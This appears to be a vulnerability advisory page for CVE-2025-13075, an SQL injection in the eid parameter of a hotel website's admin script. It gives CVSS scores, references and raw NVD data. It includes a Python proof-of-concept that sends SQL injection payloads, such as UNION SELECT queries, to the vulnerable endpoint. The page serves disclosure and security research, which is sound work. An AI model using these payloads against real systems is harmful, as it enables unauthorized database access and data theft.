CVE-2025-13075

Description

A vulnerability was detected in code-projects Responsive Hotel Site 1.0. Impacted is an unknown function of the file /admin/usersettingdel.php. Performing manipulation of the argument eid results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:responsive_hotel_site:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Responsive Hotel Site 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13075 SQL Injection PoC
# Target: Responsive Hotel Site 1.0
# File: /admin/usersettingdel.php
# Parameter: eid

def exploit_sqli(target_url, eid_payload):
    """
    Exploit SQL injection vulnerability in usersettingdel.php
    """
    # Construct the vulnerable URL
    exploit_url = f"{target_url}/admin/usersettingdel.php"
    
    # SQL injection payload
    params = {
        'eid': eid_payload
    }
    
    print(f"[*] Target: {exploit_url}")
    print(f"[*] Payload: {eid_payload}")
    
    try:
        response = requests.get(exploit_url, params=params, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        # Check for SQL error indicators
        if 'sql' in response.text.lower() or 'error' in response.text.lower():
            print("[!] SQL Error detected - vulnerability confirmed")
            print("[+] Response snippet:", response.text[:500])
        else:
            print("[*] No obvious SQL errors in response")
            
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

# Example payloads
if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = "http://localhost/hotel"
    
    # Basic SQL injection test
    payloads = [
        "1",
        "1'",
        "1' OR '1'='1",
        "1' UNION SELECT NULL--",
        "1' UNION SELECT version(),user()--"
    ]
    
    for payload in payloads:
        print(f"\n[>] Testing payload: {payload}")
        exploit_sqli(target, payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13075
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13075
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13075/
[4] VulDB https://vuldb.com/cve/CVE-2025-13075
[5] https://code-projects.org/
[6] https://github.com/zhizi1234/cve/blob/main/tmp69/tmp69/report.md
[7] https://vuldb.com/?ctiid.332206
[8] https://vuldb.com/?id.332206
[9] https://vuldb.com/?submit.682856
[10] https://github.com/zhizi1234/cve/blob/main/tmp69/tmp69/report.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13075", "sourceIdentifier": "[email protected]", "published": "2025-11-12T23:15:39.203", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in code-projects Responsive Hotel Site 1.0. Impacted is an unknown function of the file /admin/usersettingdel.php. Performing manipulation of the argument eid results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:responsive_hotel_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BEEBA52B-991B-4FF9-AE6A-14E21F1F7E50"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/zhizi1234/cve/blob/main/tmp69/tmp69/report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332206", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332206", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.682856", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/zhizi1234/cve/blob/main/tmp69/tmp69/report.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}